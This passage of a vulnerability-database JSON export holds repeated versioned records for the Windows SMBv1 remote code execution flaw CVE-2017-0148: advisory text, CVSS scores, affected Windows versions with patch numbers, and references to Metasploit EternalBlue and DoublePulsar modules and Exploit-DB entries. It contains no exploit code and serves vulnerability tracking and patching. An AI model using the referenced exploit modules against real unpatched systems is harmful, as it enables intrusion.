"KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T08:48:00", "differentElements": ["msAffectedSoftware"], "edition": 29}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-11T11:22:34", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012213", "KB4012217", "KBMS16-110, 3187754", "KB3177186", "KB3212646", "KB4012598", "KB4012606", "KB4012214", "KB4013429", "KB3210721", "KB4012215", "KB3213986", "KB4013198", "KB3205401", "KB3210720", "KB4012212", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T11:22:34", "differentElements": ["msAffectedSoftware"], "edition": 30}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-11T12:52:00", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012213", "KB4012217", "KBMS16-110, 3187754", "KB3177186", "KB3212646", "KB4012598", 
"KB4012606", "KB4012214", "KB4013429", "KB3210721", "KB4012215", "KB3213986", "KB4013198", "KB3205401", "KB3210720", "KB4012212", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T12:52:00", "differentElements": ["msAffectedSoftware"], "edition": 31}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-11T15:08:23", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
